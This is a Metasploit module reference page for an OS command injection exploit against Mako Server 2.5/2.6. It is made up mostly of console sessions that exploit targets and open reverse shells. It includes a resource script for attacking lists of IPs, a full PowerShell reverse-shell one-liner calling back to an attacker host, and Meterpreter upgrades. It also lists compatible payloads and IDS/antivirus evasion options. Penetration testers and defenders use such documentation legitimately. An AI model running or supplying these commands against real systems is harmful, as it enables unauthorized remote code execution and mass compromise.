Mako Server v2.5, 2.6 OS Command Injection RCE - Metasploit


This page contains detailed information about how to use the exploit/multi/http/makoserver_cmd_exec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Mako Server v2.5, 2.6 OS Command Injection RCE
Module: exploit/multi/http/makoserver_cmd_exec
Source code: modules/exploits/multi/http/makoserver_cmd_exec.rb
Disclosure date: 2017-09-03
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): cmd
Supported platform(s): Unix, Windows
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: -

This module exploits a vulnerability found in Mako Server v2.5, 2.6. It's possible to inject arbitrary OS commands in the Mako Server tutorial page through a PUT request to save.lsp. Attacker input will be saved on the victims machine and can be executed by sending a GET request to manage.lsp.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Using makoserver_cmd_exec against a single host

Normally, you can use exploit/multi/http/makoserver_cmd_exec this way:

msf > use exploit/multi/http/makoserver_cmd_exec
msf exploit(makoserver_cmd_exec) > show targets
    ... a list of targets ...
msf exploit(makoserver_cmd_exec) > set TARGET target-id
msf exploit(makoserver_cmd_exec) > show options
    ... show and set options ...
msf exploit(makoserver_cmd_exec) > exploit

Using makoserver_cmd_exec against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your makoserver_cmd_exec will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/multi/http/makoserver_cmd_exec")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


This module exploits a vulnerability found in Mako Server v2.5, 2.6. It's possible to inject arbitrary OS commands in the Mako Server tutorial page through a PUT request to save.lsp. Attacker input will be saved on the victims machine and can be executed by sending a GET request to manage.lsp.

Based on the public PoC found here: https://blogs.securiteam.com/index.php/archives/3391

Mako Server is an application framework for designing web and IoT applications.

This module has been verified against the following Mako Server versions for Windows XP SP3, Windows 7 SP1 and Linux Ubuntu 16.04 LTS: - v2.5 - v2.6

Links: - Windows x86 installer - Windows download page - Linux x64 installer - Linux download page - Documentation

Verification Steps


Windows

  1. Run the installer "mako.windows.x86" on a Windows 7 SP1 (x86/x64) target (with Powershell for this example to work)
  2. After installer finishes, double click the "Mako-Demo" shortcut on the desktop
  3. Start msfconsole on host
  4. Do: use exploit/multi/http/makoserver_cmd_exec
  5. Do: set RHOST <IP address of target system>
  6. Do: set PAYLOAD cmd/windows/reverse_powershell
  7. Do: set LHOST <IP address of host system>
  8. Do: exploit
  9. You should get a Windows command shell

Verification Steps


Linux

  1. Extract the "mako.linux-x64.tar.gz" on a Linux Ubuntu 16.04 LTS (x64) target (with Python for this example to work)
  2. From inside the extracted folder, do ./rundemo.sh
  3. Start msfconsole on host
  4. Do: use exploit/multi/http/makoserver_cmd_exec
  5. Do: set RHOST <IP address of target system>
  6. Do: set PAYLOAD cmd/unix/python_reverse
  7. Do: set LHOST <IP address of host system>
  8. Do: exploit
  9. You should get a Linux command shell (may need to wait ~30 seconds)

Scenarios


msf > use exploit/multi/http/makoserver_cmd_exec 
msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3
RHOST => 10.10.10.3
msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell
PAYLOAD => cmd/windows/reverse_powershell
msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.2
LHOST => 10.10.10.2
msf exploit(makoserver_cmd_exec) > exploit

[*] Started reverse TCP handler on 10.10.10.2:4444 
[*] Sending payload to target...
[*] Command shell session 1 opened (10.10.10.2:4444 -> 10.10.10.3:49175) at 2017-10-26 21:23:59 -0400

Microsoft Windows
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\Smith\Downloads\MakoServer>

Verbose Output

msf > use exploit/multi/http/makoserver_cmd_exec 
msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3
RHOST => 10.10.10.3
msf exploit(makoserver_cmd_exec) > set VERBOSE true
VERBOSE => true
msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell
PAYLOAD => cmd/windows/reverse_powershell
msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.2
LHOST => 10.10.10.2
msf exploit(makoserver_cmd_exec) > check

[*] Trying to detect running Mako Server and necessary files...
[*] Mako Server save.lsp returns correct ouput.
[*] 10.10.10.3:80 The target appears to be vulnerable.
msf exploit(makoserver_cmd_exec) > exploit

[*] Started reverse TCP handler on 10.10.10.2:4444 
[*] Sending payload to target...
[*] Now executing the following command: os.execute([[powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) {$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='10.10.10.2';$p='4444';$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if ($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e.GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};]])
[*] Sending PUT request to save.lsp...
[*] Sending GET request to manage.lsp...
[*] Command shell session 1 opened (10.10.10.2:4444 -> 10.10.10.3:49174) at 2017-10-26 21:21:08 -0400

Microsoft Windows
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\Smith\Downloads\MakoServer>

Targeting Windows 7 SP1 x64 running Mako Server v2.5

A typical scenario would be to obtain a Windows command shell and then upgrade to a Meterpreter session:

  msf > use exploit/multi/http/makoserver_cmd_exec 
  msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.2
  RHOST => 10.10.10.2
  msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell
  PAYLOAD => cmd/windows/reverse_powershell
  msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.4
  LHOST => 10.10.10.4
  msf exploit(makoserver_cmd_exec) > check
  [*] 10.10.10.2:80 The target appears to be vulnerable.
  msf exploit(makoserver_cmd_exec) > exploit

  [*] Started reverse TCP handler on 10.10.10.4:4444 
  [*] Sending payload to target...
  [*] Command shell session 1 opened (10.10.10.4:4444 -> 10.10.10.2:49189) at 2017-10-25 20:57:56 -0400

  Microsoft Windows
  Copyright (c) Microsoft Corporation.  All rights reserved.

  C:\Users\Smith\Downloads\MakoServer>^Z
  Background session 1? [y/N]  y
  msf exploit(makoserver_cmd_exec) > use multi/manage/shell_to_meterpreter
  msf post(shell_to_meterpreter) > sessions -l

  Active sessions
  ===============

    Id  Name  Type               Information  Connection
    --  ----  ----               -----------  ----------
    1         shell cmd/windows               10.10.10.4:4444 -> 10.10.10.2:49189 (10.10.10.2)
  msf post(shell_to_meterpreter) > set SESSION 1
  SESSION => 1
  msf post(shell_to_meterpreter) > set LPORT 8080
  LPORT => 8080
  msf post(shell_to_meterpreter) > exploit

  [*] Upgrading session ID: 1
  [*] Starting exploit/multi/handler
  [*] Started reverse TCP handler on 10.10.10.4:8080
  [-] Powershell is not installed on the target.
  [*] Command stager progress: 1.66% (1699/102108 bytes)
  ...
  [*] Command stager progress: 100.00% (102108/102108 bytes)
  [*] Post module execution completed
  msf post(shell_to_meterpreter) > sessions -l

  Active sessions
  ===============

    Id  Name  Type                     Information                            Connection
    --  ----  ----                     -----------                            ----------
    1         shell cmd/windows                                               10.10.10.4:4444 -> 10.10.10.2:49189 (10.10.10.2)
    2         meterpreter x86/windows  smith-PC\smith @ SMITH-PC  10.10.10.4:8080 -> 10.10.10.2:49190 (10.10.10.2)

  msf post(shell_to_meterpreter) > sessions -i 2
  [*] Starting interaction with 2...

  meterpreter > getuid
  Server username: smith-PC\smith
  meterpreter > sysinfo
  Computer        : SMITH-PC
  OS              : Windows 7 (Build 7601, Service Pack 1).
  Architecture    : x64
  System Language : en_US
  Domain          : WORKGROUP
  Logged On Users : 2
  Meterpreter     : x86/windows

Linux Ubuntu 16.04 LTS x64 running Mako Server v2.5

A typical scenario would be to obtain a Linux command shell and then upgrade to a Meterpreter session:

  msf > use exploit/multi/http/makoserver_cmd_exec 
  msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.2
  RHOST => 10.10.10.2
  msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/unix/reverse_python
  PAYLOAD => cmd/unix/reverse_python
  msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.4
  LHOST => 10.10.10.4
  msf exploit(makoserver_cmd_exec) > check
  [*] 10.10.10.2:80 The target appears to be vulnerable.
  msf exploit(makoserver_cmd_exec) > exploit

  [*] Started reverse TCP handler on 10.10.10.4:4444 
  [*] Sending payload to target...
  [*] Command shell session 1 opened (10.10.10.4:4444 -> 10.10.10.2:57888) at 2017-11-10 15:52:33 -0500

  ls
  LICENSE.txt
  mako
  mako.zip
  README.txt
  rundemo.sh
  tutorial
  ^Z
  Background session 1? [y/N]  y
  msf exploit(makoserver_cmd_exec) > use multi/manage/shell_to_meterpreter
  msf post(shell_to_meterpreter) > sessions -l

  Active sessions
  ===============

    Id  Name  Type            Information  Connection
    --  ----  ----            -----------  ----------
    1         shell cmd/unix               10.10.10.4:4444 -> 10.10.10.2:57888 (10.10.10.2)

  msf post(shell_to_meterpreter) > set SESSION 1
  SESSION => 1
  msf post(shell_to_meterpreter) > set LPORT 8080
  LPORT => 8080
  msf post(shell_to_meterpreter) > exploit

  [*] Upgrading session ID: 1
  [*] Starting exploit/multi/handler
  [*] Started reverse TCP handler on 10.10.10.4:8080 
  [*] Sending stage (847604 bytes) to 10.10.10.2
  [*] Meterpreter session 2 opened (10.10.10.4:8080 -> 10.10.10.2:60448) at 2017-11-10 15:54:38 -0500
  [*] Command stager progress: 100.00% (736/736 bytes)
  [*] Post module execution completed
  msf post(shell_to_meterpreter) > sessions -l

  Active sessions
  ===============

    Id  Name  Type                   Information                                            Connection
    --  ----  ----                   -----------                                            ----------
    1         shell cmd/unix                                                                10.10.10.4:4444 -> 10.10.10.2:57888 (10.10.10.2)
    2         meterpreter x86/linux  uid=1000, gid=1000, euid=1000, egid=1000 @ 10.10.10.2  10.10.10.4:8080 -> 10.10.10.2:60448 (10.10.10.2)
  msf post(shell_to_meterpreter) > sessions -i 2
  [*] Starting interaction with 2...

  meterpreter > getuid
  Server username: uid=1000, gid=1000, euid=1000, egid=1000
  meterpreter > sysinfo
  Computer     : 10.10.10.2
  OS           : Ubuntu 16.04 (Linux 4.10.0-35-generic)
  Architecture : x64
  Meterpreter  : x86/linux

Go back to menu.

Msfconsole Usage


Here is how the multi/http/makoserver_cmd_exec exploit module looks in the msfconsole:

msf6 > use exploit/multi/http/makoserver_cmd_exec

[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/http/makoserver_cmd_exec) > show info

       Name: Mako Server v2.5, 2.6 OS Command Injection RCE
     Module: exploit/multi/http/makoserver_cmd_exec
   Platform: Windows, Unix
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2017-09-03

Provided by:
  John Page (hyp3rlinx) - Beyond Security SecuriTeam Secure Disclosure
  Steven Patterson (Shogun Lab) <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Mako Server v2.5, 2.6

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       URI path to the Mako Server app
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits a vulnerability found in Mako Server v2.5, 2.6. 
  It's possible to inject arbitrary OS commands in the Mako Server 
  tutorial page through a PUT request to save.lsp. Attacker input will 
  be saved on the victims machine and can be executed by sending a GET 
  request to manage.lsp.

References:
  https://www.exploit-db.com/exploits/42683
  https://blogs.securiteam.com/index.php/archives/3391

Module Options


This is a complete list of options available in the multi/http/makoserver_cmd_exec exploit:

msf6 exploit(multi/http/makoserver_cmd_exec) > show options

Module options (exploit/multi/http/makoserver_cmd_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       URI path to the Mako Server app
   VHOST                       no        HTTP server virtual host

Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Mako Server v2.5, 2.6

Advanced Options


Here is a complete list of advanced options supported by the multi/http/makoserver_cmd_exec exploit:

msf6 exploit(multi/http/makoserver_cmd_exec) > show advanced

Module advanced options (exploit/multi/http/makoserver_cmd_exec):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (cmd/unix/reverse_netcat):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the multi/http/makoserver_cmd_exec module can exploit:

msf6 exploit(multi/http/makoserver_cmd_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Mako Server v2.5, 2.6

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the multi/http/makoserver_cmd_exec exploit:

msf6 exploit(multi/http/makoserver_cmd_exec) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/cmd/unix/bind_awk                                    normal  No     Unix Command Shell, Bind TCP (via AWK)
   1   payload/cmd/unix/bind_busybox_telnetd                        normal  No     Unix Command Shell, Bind TCP (via BusyBox telnetd)
   2   payload/cmd/unix/bind_jjs                                    normal  No     Unix Command Shell, Bind TCP (via jjs)
   3   payload/cmd/unix/bind_lua                                    normal  No     Unix Command Shell, Bind TCP (via Lua)
   4   payload/cmd/unix/bind_netcat                                 normal  No     Unix Command Shell, Bind TCP (via netcat)
   5   payload/cmd/unix/bind_netcat_gaping                          normal  No     Unix Command Shell, Bind TCP (via netcat -e)
   6   payload/cmd/unix/bind_netcat_gaping_ipv6                     normal  No     Unix Command Shell, Bind TCP (via netcat -e) IPv6
   7   payload/cmd/unix/bind_nodejs                                 normal  No     Unix Command Shell, Bind TCP (via nodejs)
   8   payload/cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)
   9   payload/cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   10  payload/cmd/unix/bind_r                                      normal  No     Unix Command Shell, Bind TCP (via R)
   11  payload/cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)
   12  payload/cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   13  payload/cmd/unix/bind_socat_udp                              normal  No     Unix Command Shell, Bind UDP (via socat)
   14  payload/cmd/unix/bind_stub                                   normal  No     Unix Command Shell, Bind TCP (stub)
   15  payload/cmd/unix/bind_zsh                                    normal  No     Unix Command Shell, Bind TCP (via Zsh)
   16  payload/cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
   17  payload/cmd/unix/pingback_bind                               normal  No     Unix Command Shell, Pingback Bind TCP (via netcat)
   18  payload/cmd/unix/pingback_reverse                            normal  No     Unix Command Shell, Pingback Reverse TCP (via netcat)
   19  payload/cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   20  payload/cmd/unix/reverse_awk                                 normal  No     Unix Command Shell, Reverse TCP (via AWK)
   21  payload/cmd/unix/reverse_bash                                normal  No     Unix Command Shell, Reverse TCP (/dev/tcp)
   22  payload/cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   23  payload/cmd/unix/reverse_bash_udp                            normal  No     Unix Command Shell, Reverse UDP (/dev/udp)
   24  payload/cmd/unix/reverse_jjs                                 normal  No     Unix Command Shell, Reverse TCP (via jjs)
   25  payload/cmd/unix/reverse_ksh                                 normal  No     Unix Command Shell, Reverse TCP (via Ksh)
   26  payload/cmd/unix/reverse_lua                                 normal  No     Unix Command Shell, Reverse TCP (via Lua)
   27  payload/cmd/unix/reverse_ncat_ssl                            normal  No     Unix Command Shell, Reverse TCP (via ncat)
   28  payload/cmd/unix/reverse_netcat                              normal  No     Unix Command Shell, Reverse TCP (via netcat)
   29  payload/cmd/unix/reverse_netcat_gaping                       normal  No     Unix Command Shell, Reverse TCP (via netcat -e)
   30  payload/cmd/unix/reverse_nodejs                              normal  No     Unix Command Shell, Reverse TCP (via nodejs)
   31  payload/cmd/unix/reverse_openssl                             normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)
   32  payload/cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)
   33  payload/cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   34  payload/cmd/unix/reverse_php_ssl                             normal  No     Unix Command Shell, Reverse TCP SSL (via php)
   35  payload/cmd/unix/reverse_python                              normal  No     Unix Command Shell, Reverse TCP (via Python)
   36  payload/cmd/unix/reverse_python_ssl                          normal  No     Unix Command Shell, Reverse TCP SSL (via python)
   37  payload/cmd/unix/reverse_r                                   normal  No     Unix Command Shell, Reverse TCP (via R)
   38  payload/cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   39  payload/cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   40  payload/cmd/unix/reverse_socat_udp                           normal  No     Unix Command Shell, Reverse UDP (via socat)
   41  payload/cmd/unix/reverse_ssh                                 normal  No     Unix Command Shell, Reverse TCP SSH
   42  payload/cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)
   43  payload/cmd/unix/reverse_stub                                normal  No     Unix Command Shell, Reverse TCP (stub)
   44  payload/cmd/unix/reverse_tclsh                               normal  No     Unix Command Shell, Reverse TCP (via Tclsh)
   45  payload/cmd/unix/reverse_zsh                                 normal  No     Unix Command Shell, Reverse TCP (via Zsh)
   46  payload/cmd/windows/adduser                                  normal  No     Windows Execute net user /ADD CMD
   47  payload/cmd/windows/bind_lua                                 normal  No     Windows Command Shell, Bind TCP (via Lua)
   48  payload/cmd/windows/bind_perl                                normal  No     Windows Command Shell, Bind TCP (via Perl)
   49  payload/cmd/windows/bind_perl_ipv6                           normal  No     Windows Command Shell, Bind TCP (via perl) IPv6
   50  payload/cmd/windows/bind_ruby                                normal  No     Windows Command Shell, Bind TCP (via Ruby)
   51  payload/cmd/windows/download_eval_vbs                        normal  No     Windows Executable Download and Evaluate VBS
   52  payload/cmd/windows/download_exec_vbs                        normal  No     Windows Executable Download and Execute (via .vbs)
   53  payload/cmd/windows/generic                                  normal  No     Windows Command, Generic Command Execution
   54  payload/cmd/windows/powershell_bind_tcp                      normal  No     Windows Interactive Powershell Session, Bind TCP
   55  payload/cmd/windows/powershell_reverse_tcp                   normal  No     Windows Interactive Powershell Session, Reverse TCP
   56  payload/cmd/windows/reverse_lua                              normal  No     Windows Command Shell, Reverse TCP (via Lua)
   57  payload/cmd/windows/reverse_perl                             normal  No     Windows Command, Double Reverse TCP Connection (via Perl)
   58  payload/cmd/windows/reverse_powershell                       normal  No     Windows Command Shell, Reverse TCP (via Powershell)
   59  payload/cmd/windows/reverse_ruby                             normal  No     Windows Command Shell, Reverse TCP (via Ruby)
   60  payload/generic/custom                                       normal  No     Custom Payload
   61  payload/generic/shell_bind_tcp                               normal  No     Generic Command Shell, Bind TCP Inline
   62  payload/generic/shell_reverse_tcp                            normal  No     Generic Command Shell, Reverse TCP Inline

Evasion Options


Here is the full list of possible evasion options supported by the multi/http/makoserver_cmd_exec exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(multi/http/makoserver_cmd_exec) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Target is not a Mako Server.


Here is a relevant code snippet related to the "Target is not a Mako Server." error message:

56:	             'uri'    => normalize_uri(target_uri.path, 'examples/save.lsp')
57:	           }, 20)
58:	
59:	    # If response does not include "MakoServer.net", target is not viable.
60:	    if res.headers['Server'] !~ /MakoServer\.net/
61:	      vprint_warning('Target is not a Mako Server.')
62:	      return CheckCode::Safe
63:	    end
64:	
65:	    if res.body
66:	      if res.body.include?('Incorrect usage')

Mako Server save.lsp did not return expected output.


Here is a relevant code snippet related to the "Mako Server save.lsp did not return expected output." error message:

69:	        vprint_status('Mako Server save.lsp returns correct ouput.')
70:	        return CheckCode::Appears
71:	      else
72:	        # The page exists, but is not returning the expected output.
73:	        # May be a different version?
74:	        vprint_warning('Mako Server save.lsp did not return expected output.')
75:	        return CheckCode::Detected
76:	      end
77:	    else
78:	      # The above checks failed and exploitability could not be determined.
79:	      vprint_error('Unable to determine exploitability, save.lsp not found.')

Unable to determine exploitability, save.lsp not found.


Here is a relevant code snippet related to the "Unable to determine exploitability, save.lsp not found." error message:

74:	        vprint_warning('Mako Server save.lsp did not return expected output.')
75:	        return CheckCode::Detected
76:	      end
77:	    else
78:	      # The above checks failed and exploitability could not be determined.
79:	      vprint_error('Unable to determine exploitability, save.lsp not found.')
80:	      return CheckCode::Unknown
81:	    end
82:	
83:	    CheckCode::Safe
84:	  end

Error: <E>


Here is a relevant code snippet related to the "Error: <E>" error message:

105:	         'vars_get' => {
106:	           'ex' => '2.1'
107:	         }
108:	       }, 20)
109:	    rescue StandardError => e
110:	      fail_with(Failure::NoAccess, "Error: #{e}")
111:	    end
112:	
113:	    # Send a GET request to manage.lsp with execute set to true
114:	    begin
115:	      vprint_status('Sending GET request to manage.lsp...')

Error: <E>


Here is a relevant code snippet related to the "Error: <E>" error message:

119:	         'vars_get' => {
